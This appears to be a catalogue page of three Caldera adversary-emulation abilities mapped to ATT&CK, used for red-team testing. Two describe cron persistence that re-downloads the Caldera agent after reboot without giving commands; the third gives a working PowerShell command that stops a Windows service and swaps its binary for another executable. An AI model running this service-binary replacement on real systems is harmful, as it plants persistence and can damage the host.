Caldera emulation abilities
3 runnable adversary-emulation actions · command + platform · mapped to ATT&CK
Abilities
persistence
Create persistence cron job for current user
After the target host is rebooted, it will automatically reach out to the Caldera server to download and execute the Caldera agent, creating persistent access after reboot. No command is listed for this ability on this page.
persistence
Create persistence cron job for root user (requires sudo)
After the target host is rebooted, it will automatically reach out to the Caldera server to download and execute the Caldera agent, creating persistent root access after reboot. No command is listed for this ability on this page.
Replace a service binary with alternate binary
This is an example technique. snmptrap.exe should be replaced in the command below with the desired service binary. Depending on the value of host.service.modifiable, this ability can damage the target system.
Platform: windows · Executor: psh
Command (the #{host.service.modifiable} placeholder is a Caldera fact filled in at run time):
    $s = Get-Service -Name #{host.service.modifiable};
    if ($s.status -ne 'Stopped') { Stop-Service $s };
    $exe = (Get-ItemProperty -Path "HKLM:\System\CurrentControlSet\Services\#{host.service.modifiable}").ImagePath.split()[0];
    $path = (Resolve-Path $exe).Path;
    Copy-Item -Path $path -Destination ($path + ".saved");
    Copy-Item -Path "C:\Windows\System32\snmptrap.exe" -Destination $path
The original service binary is kept alongside the replacement with a .saved suffix, which is the artifact a responder would look for when restoring the service.